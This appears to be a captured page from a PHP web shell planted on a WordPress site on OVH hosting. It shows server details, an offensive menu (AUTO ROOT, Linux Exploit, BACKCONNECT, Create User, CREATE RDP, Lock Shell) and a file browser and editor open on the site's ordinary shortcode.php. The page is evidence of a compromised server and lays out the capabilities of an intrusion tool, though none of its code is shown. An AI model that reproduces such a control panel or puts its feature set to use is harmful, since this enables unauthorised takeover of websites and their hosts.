Linux webd002.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.121.40.2 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.2.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
letacommog /
winwithd /
wp-includes /
blocks /
[ HOME SHELL ]
Name
Size
Permission
Action
shortcode
[ DIR ]
drwxr-xr-x
social-link
[ DIR ]
drwxr-xr-x
archives.php
3.21
KB
-rw-r--r--
block.php
1006
B
-rw-r--r--
calendar.php
2.02
KB
-rw-r--r--
categories.php
3.01
KB
-rw-r--r--
latest-comments.php
5.62
KB
-rw-r--r--
latest-posts.php
7.01
KB
-rw-r--r--
rss.php
4.09
KB
-rw-r--r--
search.php
2.3
KB
-rw-r--r--
shortcode.php
824
B
-rw-r--r--
social-link.php
54.47
KB
-rw-r--r--
tag-cloud.php
1.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : shortcode.php
<?php /** * Server-side rendering of the `core/shortcode` block. * * @package WordPress */ /** * Performs wpautop() on the shortcode block content. * * @param array $attributes The block attributes. * @param string $content The block content. * * @return string Returns the block content. */ function render_block_core_shortcode( $attributes, $content ) { return wpautop( $content ); } /** * Registers the `core/shortcode` block on server. */ function register_block_core_shortcode() { $path = __DIR__ . '/shortcode/block.json'; $metadata = json_decode( file_get_contents( $path ), true ); register_block_type( $metadata['name'], array_merge( $metadata, array( 'render_callback' => 'render_block_core_shortcode', ) ) ); } add_action( 'init', 'register_block_core_shortcode' );
Close